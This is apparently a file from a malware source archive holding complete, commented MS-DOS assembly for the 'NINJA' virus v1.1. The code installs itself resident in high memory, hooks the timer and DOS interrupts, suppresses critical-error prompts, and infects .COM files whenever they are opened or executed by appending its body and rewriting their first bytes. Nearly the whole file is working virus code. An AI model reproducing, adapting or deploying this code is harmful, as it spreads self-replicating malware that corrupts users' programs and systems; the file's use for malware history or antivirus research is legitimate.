MalwareSourceCode/MSDOS/N-Index/Virus.MSDOS.Unknown.ninja_1.asm

530 lines
15 KiB
NASM
Raw Normal View History

2022-08-21 09:07:57 +00:00
;NINJA virus v1.1 _sandoz_
;I dont believe that NINJA scans, it was developed from Soviet block virus
;code that was aquired late in 1988. For this reason some features are missing
;such as original encryption, which really wont be missed. However some features
;are rather unique. used were System Violator's Virus Mutator and some luck.
;an oldie but interesting.
cseg segment
assume cs:cseg, ds:cseg, es:cseg, ss:cseg
org 100h
l_0100: mov bx,offset l_0146 ;0100.BB 0146
jmp bx ;Register jump ;0103 FF E3
;-------victim code----------------------------------------------
; ...
org 0146h
;=======virus code begin=========================================
; in resident virus this code begins at 9000h:0A000h
;----------------------------------------------------------------
l_0146: push ds ;<- Entry into virus ;0146 1E
push es ;0147 06
push ax ;0148 50
NOP
push ds ;<-victim code restore ;0149 1E
pop es ;014A 07
mov si,bx ;offset wejscia w wirusa;014B 8B F3
add si,02D3h ;(419)changed code saved;014D.81 C6 02D3
mov di,0100h ;changed code address ;0151.BF 0100
mov cx,5 ;length of change ;0154 B9 0005
rep movsb ;0157 F3/ A4
push ds ;0159 1E
xor ax,ax ;<- get int 8 ;015A 31 C0
push ax ;015C 50
pop ds ;015D 1F
mov si,20h ;int 8h ;015E.BE 0020
mov di,bx ;0161 8B FB
add di,0E6h ;(022Ch)=old int 8 ;0163.81 C7 00E6
mov cx,4 ;0167 B9 0004
rep movsb ;016A F3/ A4
mov ax,bx ;016C 8B C3
add ax,57h ;(019Dh)=continuat. adr.;016E 05 0057
call s_0193 ;0171 E8 001F
pop ds ;0174 1F
l_0175: jmp short l_0175 ;int 8 waiting loop ;0175 EB FE
;<----- return after int 8 service-------------------------------
l_0177: cli ;<- int 8 vector restore;0177 FA
xor ax,ax ;0178 31 C0
mov es,ax ;017A 8E C0
mov di,0020h ;017C.BF 20 00
mov si,bx ;017F 8B F3
add si,0E9h ;(022Ch) ;0181.81 C6 E6 00
mov cx,4 ;0185 B9 04 00
repz movsb ;0188 F3 / A4
sti ;018A FB
NOP
pop ax ;<- run victim programm ;018B 58
pop es ;018C 07
pop ds ;018D 1F
mov bx,0100h ;execution begin address;018E.BB 00 01
jmp bx ;0191 FF E3
;<----- "get int 8" routine -------------------------------------
s_0193 proc near
cli ; Disable interrupts ;0193 FA
mov ds:[20h],ax ;0194 A3 0020
mov ds:[22h],es ;0197 8C 06 0022
sti ; Enable interrupts ;019B FB
retn ;019C C3
s_0193 endp
;<----- code executed after interrupt int 8----------------------
l_019D: pushf ;019D 9C
push ax ;019E 50
push bx ;019F 53
push cx ;01A0 51
push dx ;01A1 52
push si ;01A2 56
push di ;01A3 57
push es ;01A4 06
push ds ;01A5 1E
push bp ;01A6 55
mov bp,sp ;01A7 8B EC
mov ax,bx ;base to virus code ;01A9 8B C3
add ax,2Fh ;(175h) ;01AB 05 002F
cmp ss:[bp+14h],ax ;interrupted code CS seg;01AE 36 39 46 14
jnz l_0220 ;-> we must wait again ;01B2 75 6C
l_01B4: add word ptr ss:[BP+14],3 ;chng ret addr to l_0177;01B4 36 83 46 14 03
;<- restore int 8 vector
push ds ;02B9 1E
xor ax,ax ;01BA 31 C0
push ax ;01BC 50
POP DS ;01BD 1F
CLI ;01BE FA
MOV AX,cs:[BX+00E6h] ;(022Ch) old int 8 vect ;01BF 2E 8B 87 E6 00
MOV ds:[20h],AX ;01C4 A3 20 00
MOV AX,cs:[BX+00E8h] ;01C7 2E 8B 87 E8 00
MOV ds:[22h],AX ;01CC A3 22 00
POP DS ;01CF 1F
MOV AX,9000h ;memory last 64KB ;01D0 B8 00 90
MOV ES,AX ;01D3 8E C0
MOV SI,BX ;virus code begin ;01D5 8B F3
MOV DI,0A000h ;the last 24KB of mem ;01D7 BF 00 A0
MOV AL,es:[DI] ;01DA 26 8A 05
CMP AL,1Eh ;allready installed ? ;01DD 3C 1E
JZ l_0220 ;-> yes, end of job ;01DF 74 3F
MOV CX,02FBh ;virus code length ;01E1 B9 FB 02
REPZ MOVSB ;copy virus code ;01E4 F3 / A4
;<- Make link to DOS
CALL s_0230 ;first DOS version ;01E6 E8 47 00
JZ l_0220 ;-> O.K. ;01E9 74 35
CALL s_027D ;Second DOS version ;01EB E8 8F 00
JZ l_0220 ;-> O.K. ;01EE 74 30
CALL s_02CA ;third DOS version ;01F0 E8 D7 00
JZ l_0220 ;-> O.K. ;01F3 74 2B
;<- Unknown DOS version, BRUTE installation
MOV AX,9000h ;01F5 B8 00 90
PUSH AX ;01F8 50
POP ES ;01F9 07
XOR AX,AX ;01FA 31 C0
PUSH AX ;01FC 50
POP DS ;01FD 1F
MOV AX,ds:[84h] ;01FE A1 84 00
MOV es:[0A1DFh],AX ;(0325) ;0201 26 A3 DF A1
MOV es:[0A2CEh],AX ;(0414) ;0205 26 A3 CE A2
MOV AX,ds:[86h] ;0209 A1 86 00
MOV es:[0A1E1h],AX ;(0327) ;020C 26 A3 E1 A1
MOV es:[0A2D0h],AX ;(0416) ;0210 26 A3 D0 A2
MOV AX,0A1D1h ;(0317) new int 21h hndl;0214 B8 D1 A1
MOV ds:[84h],AX ;int 21h ;0217 A3 84 00
MOV AX,9000h ;resident virus segment ;021A B8 00 90
MOV ds:[86h],AX ;021D A3 86 00
l_0220: pop bp ;0220 5D
pop ds ;0221 1F
pop es ;0221 07
pop di ;0222 5F
pop si ;0223 5E
pop dx ;0224 5A
pop cx ;0226 59
pop bx ;0227 5B
pop ax ;0228 58
popf ;0229 9D
sti ;022A FB
db 0EAh ;022B EA
r_00E6 db 0ABh,00h,0C2h,0Bh ;022C AB 00 C2 0B
; jmp 0BC2:00AB ;-> oryginal int 8
;================================================================
; Make link to DOS - first DOS version
;----------------------------------------------------------------
s_0230: PUSH DS ;0230 1E
PUSH ES ;0231 06
XOR AX,AX ;<- check possibility ;0232 31 C0
PUSH AX ;0234 50
POP DS ;0235 1F
MOV AX,ds:[86h] ;oryginal int 21h seg ;0236 A1 86 00
PUSH AX ;0239 50
POP DS ;023A 1F
MOV BX,0100h ;023B BB 00 01
CMP BYTE PTR [BX],0E9h ;023E 80 3F E9
JNZ l_027A ;-> unknown system ;0241 75 37
INC BX ;0243 43
CMP BYTE PTR [BX],53h ;0244 80 3F 53
JNZ l_027A ;-> unknown system ;0247 75 31
INC BX ;0249 43
CMP BYTE PTR [BX],22h ;024A 80 3F 22
JNZ l_027A ;-> unknown system ;024D 75 2B
;<- make link to DOS
MOV AX,9000h ;024F B8 00 90
MOV ES,AX ;0252 8E C0
MOV SI,1223h ;0254 BE 23 12
MOV DI,0A2CEh ;(0414) ;0257 BF CE A2
MOV CX,4 ;025A B9 04 00
REPZ MOVSB ;025D F3 / A4
MOV SI,1223h ;025F BE 23 12
MOV DI,0A1DFh ;(0325) ;0262 BF DF A1
MOV CX,4 ;0265 B9 04 00
REPZ MOVSB ;0268 F3 / A4
MOV AX,0A1D1h ;(0317)=new int 21h hndl;026A B8 D1 A1
MOV ds:[1223h],AX ;026D A3 23 12
MOV AX,9000h ;0270 B8 00 90
MOV ds:[1225h],AX ;0273 A3 25 12
XOR AX,AX ;0276 31 C0
CMP AL,AH ;0278 38 E0
l_027A: pop es ;027A 07
pop ds ;027B 1F
retn ;027C C3
;================================================================
; Make link to DOS - second DOS version
;----------------------------------------------------------------
s_027D: push ds ;027D 1E
push es ;027E 06
xor ax,ax ;<- check possibility ;027F 31 C0
push ax ;0281 50
pop ds ;0282 1F
mov ax,ds:[86h] ;oryginal int 21h seg ;0283 A1 0086
push ax ;0286 50
pop ds ;0287 1F
mov bx,0100h ;0288 .BB 0100
cmp byte ptr [bx],0E9h ;028B 80 3F E9
jne l_02C7 ;-> unknown system ;028E 75 37
inc bx ;0290 43
cmp byte ptr [bx],0CAh ;0291 80 3F CA
jne l_02C7 ;-> unknown system ;0294 75 31
inc bx ;0296 43
cmp byte ptr [bx],13h ;0297 80 3F 13
jne l_02C7 ;-> unknown system ;029A 75 2B
;<- make link to DOS
mov ax,9000h ;029C B8 9000
mov es,ax ;029F 8E C0
mov si,011Dh ;02A1 .BE 011D
mov di,0A2CEh ;(0414) ;02A4 .BF A2CE
mov cx,4 ;02A7 B9 0004
rep movsb ;02AA F3/ A4
mov si,011Dh ;02AC .BE 011D
mov di,0A1DFh ;(0325) ;02AF .BF A1DF
mov cx,4 ;02B2 B9 0004
rep movsb ;02B5 F3/ A4
mov ax,0A1D1h ;(0317)=new int 21h hndl;02B7 B8 A1D1
mov ds:[011Dh],ax ;02BA A3 011D
mov ax,9000h ;02BD B8 9000
mov ds:[011Fh],ax ;02C0 A3 011F
xor ax,ax ;02C3 31 C0
cmp al,ah ;02C5 38 E0
l_02C7: pop es ;02C7 07
pop ds ;02C8 1F
retn ;02C9 C3
;===============================================================
; Make link to DOS - third DOS version
;---------------------------------------------------------------
s_02CA: push ds ;02CA 1E
push es ;02CB 06
xor ax,ax ;<- check possibility ;02CC 31 C0
push ax ;02CE 50
pop ds ;02CF 1F
mov ax,ds:[86h] ;oryginal int 21h seg ;02D0 A1 0086
push ax ;02D3 50
pop ds ;02D4 1F
mov bx,100h ;02D5 .BB 0100
cmp byte ptr [bx],0E9h ;02D8 80 3F E9
jne l_0314 ;-> unknown system ;02DB 75 37
inc bx ;02DD 43
cmp byte ptr [bx],15h ;02DE 80 3F 15
jne l_0314 ;-> unknown system ;02E1 75 31
inc bx ;02E3 43
cmp byte ptr [bx],5 ;02E4 80 3F 05
jne l_0314 ;-> unknown system ;02E7 75 2B
;<- make link to DOS
mov ax,9000h ;02E9 B8 9000
mov es,ax ;02EC 8E C0
mov si,0040Fh ;02EE .BE 040F
mov di,0A2CEh ;(0414) ;02F1 .BF A2CE
mov cx,4 ;02F4 B9 0004
rep movsb ;02F7 F3/ A4
mov si,0040Fh ;02F9 .BE 040F
mov di,0A1DFh ;(0325) ;02FC .BF A1DF
mov cx,4 ;02FF B9 0004
rep movsb ;0302 F3/ A4
mov ax,0A1D1h ;(0317)=new int 21h hndl;0304 B8 A1D1
mov ds:[040Fh],ax ;0307 A3 040F
mov ax,9000h ;030A B8 9000
mov ds:[0411h],ax ;030D A3 0411
xor ax,ax ;0310 31 C0
cmp al,ah ;0312 38 E0
l_0314: pop es ;0314 07
pop ds ;0315 1F
retn ;0316 C3
;==========================================================================
; New int 21h handling subroutine
;--------------------------------------------------------------------------
T_A1D1: cmp ah,3Dh ;open file ? ;0317 80 FC 3D
je l_0321 ;-> Yes ;031A 74 05
cmp ah,4Bh ;load&execute/load ovl ?;031C 80 FC 4B
jne l_0324 ;-> No ;031F 75 03
l_0321: call s_0329 ;-> infect file ;0321 E8 0005
l_0324: db 0EAh ;<- oryginal int 21h ;0324 EA
d_A1DF dw 1460h,0273h ;old int 21h ;0325 60 14 73 02
; jmp far ptr 0273:1460
;==========================================================================
; Infecting subroutine
;--------------------------------------------------------------------------
s_0329 proc near
push ax ;0329 50
push bx ;032A 53
push cx ;032B 51
push dx ;032C 52
push ds ;032D 1E
push di ;032E 57
push si ;032F 56
push es ;0330 06
push ds ;0331 1E
push es ;0332 06
NOP
xor ax,ax ;<- get int 24h ;0333 31 C0
push ax ;0335 50
pop ds ;0336 1F
push cs ;0337 0E
pop es ;0338 07
mov si,90h ;int 24h vector ;0339 .BE 0090
mov di,0A2E0h ;(0426)-old vector safes;033C .BF A2E0
mov cx,4 ;double word ;033F B9 0004
rep movsb ;0342 F3/ A4
mov ax,0A2C9h ;(040F)=new int 24h ;0344 B8 A2C9
mov ds:[90h],ax ;0347 A3 0090
mov ds:[92h],cs ;034A 8C 0E 0092
NOP
pop es ;034E 07
pop ds ;034F 1F
mov di,dx ;file path ;0350 8B FA
push ds ;0352 1E
pop es ;0353 07
mov cx,40h ;find dot ;0354 B9 0040
mov al,2Eh ;0357 B0 2E
repne scasb ;0359 F2/ AE
cmp cx,0 ;035B 83 F9 00
jne l_0363 ;035E 75 03
jmp l_0406 ;-> no file extension ;0360 E9 00A3
l_0363: push cs ;0363 0E
pop es ;0364 07
mov si,di ;0365 8B F7
mov di,0A2DDh ;(0423)='COM' ;0367 .BF A2DD
mov cx,3 ;036A B9 0003
repe cmpsb ;036D F3/ A6
cmp cx,0 ;036F 83 F9 00
je l_0377 ;0372 74 03
jmp l_0406 ;-> it isn't *.COM ;0374 E9 008F
;<- *.COM file infection
l_0377: mov ax,4300h ;Get file attributes ;0377 B8 4300
call s_0412 ;int 21h call ;037A E8 0095
mov ds:[0A2E4h],cx ;(042A) ;037D 89 0E A2E4
and cx,0FFFEh ;no R/O ;0381 81 E1 FFFE
mov ax,4301h ;Set file attributes ;0385 B8 4301
call s_0412 ;int 21h call ;0388 E8 0087
mov ah,3Dh ;Open File ;038B B4 3D
mov al,2 ;R/W access ;038D B0 02
call s_0412 ;int 21h call ;038F E8 0080
jc l_0406 ;-> Opening Error ;0392 72 72
push cs ;0394 0E
pop ds ;0395 1F
mov bx,ax ;file handle ;0396 8B D8
mov dx,0A2D3h ;(0419) = file buffer ;0398 BA A2D3
mov cx,5 ;bytes count ;039B B9 0005
mov ah,3Fh ;read file ;039E B4 3F
call s_0412 ;int 21h call ;03A0 E8 006F
mov ah,0BBh ;allready infected ? ;03A3 B4 BB
cmp ah,ds:[0A2D3h] ;(0419) ;03A5 3A 26 A2D3
je l_03E2 ;-> yes, close file ;03A9 74 37
xor cx,cx ;03AB 31 C9
xor dx,dx ;03AD 31 D2
mov ah,42h ;Move file ptr ;03AF B4 42
mov al,2 ;EOF + offset ;03B1 B0 02
call s_0412 ;int 21h call ;03B3 E8 005C
cmp ax,0FA00h ;file size =<64000 ;03B6 3D FA00
ja l_03E2 ;-> above, close file ;03B9 77 27
add ax,100h ;PSP length ;03BB 05 0100
mov ds:[0A2D9h],ax ;(041F) - vir.begin addr;03BE A3 A2D9
mov ah,40h ;Write file ;03C1 B4 40
mov dx,0A000h ;address of buffer ;03C3 BA A000
mov cx,2FBh ;bytes count ;03C6 B9 02FB
call s_0412 ;int 21h call ;03C9 E8 0046
xor cx,cx ;03CC 31 C9
xor dx,dx ;03CE 31 D2
mov ah,42h ;Move file ptr ;03D0 B4 42
mov al,0 ;BOF + offset ;03D2 B0 00
call s_0412 ;int 21h call ;03D4 E8 003B
mov ah,40h ;Write file ;03D7 B4 40
mov dx,0A2D8h ;(041E)=BOF virus code ;03D9 BA A2D8
mov cx,5 ;code length ;03DC B9 0005
call s_0412 ;int 21h call ;03DF E8 0030
l_03E2: mov ah,3Eh ;close file ;03E2 B4 3E
call s_0412 ;int 21h call ;03E4 E8 002B
mov cx,ds:[0A2E4h] ;(042A) - old atribute ;03E7 8B 0E A2E4
mov ax,4301h ;set file attributes ;03EB B8 4301
call s_0412 ;int 21h call ;03EE E8 0021
push ds ;03F1 1E
push es ;03F2 06
xor ax,ax ;restore int 24h vector ;03F3 31 C0
push ax ;03F5 50
pop es ;03F6 07
push cs ;03F7 0E
pop ds ;03F8 1F
mov di,90h ;int 24h vector ;03F9 .BF 0090
mov si,0A2E0h ;(0426) - old int 24h ;03FC .BE A2E0
mov cx,4 ;double word ;03FF B9 0004
rep movsb ;0402 F3/ A4
pop es ;0404 07
pop ds ;0405 1F
l_0406: pop es ;<- EXIT ;0406 07
pop si ;0407 5E
pop di ;0408 5F
pop ds ;0409 1F
pop dx ;040A 5A
pop cx ;040B 59
pop bx ;040C 5B
pop ax ;040D 58
retn ;040E C3
s_0329 endp
;================================================================
; int 24h handling routine (only infection time)
;----------------------------------------------------------------
T_A2C9: mov al,0 ;ignore critical error ;040F B0 00
iret ;0411 CF
;================================================================
; hidden int 21h call
;----------------------------------------------------------------
s_0412 proc near
pushf ;0412 9C
db 9Ah ;0413 9A
d_A2CE dw 1460h,0273h ;old int 21h ;0414 60 14 73 02
;call far ptr 0273:1460
retn ;0418 C3
s_0412 endp
;<----- oryginal BOF code
d_A2D3 db 31h,0Dh,0Ah,32h,0Dh ;0419 31 0D 0A 32 0D
;<----- wirus BOF code
d_A2D8 db 0BBh ;041E BB
d_A2D9 dw 0146h ;virus begin address ;041F 46 01
dw 0E3FFh ;0421 FF E3
;<----- work bytes
d_A2DD db 'COM' ;file extension pattern ;0423 43 4F 4D
d_A2E0 dw 0556h,1232h ;old int 24h vector ;0426 56 05 32 12
d_A2E4 dw 0 ;file attributes ;042A 00 00
;<----- just my way of sayin' howdy
db '-=NINJA=- <sandoz 1993>' ;042C 50 43 2D 46 4C 55
; 20 62 79 20 57 49
; 5A 41 52 44 20 31
; 39 39 31
cseg ends
end l_0100
2021-01-12 23:52:14 +00:00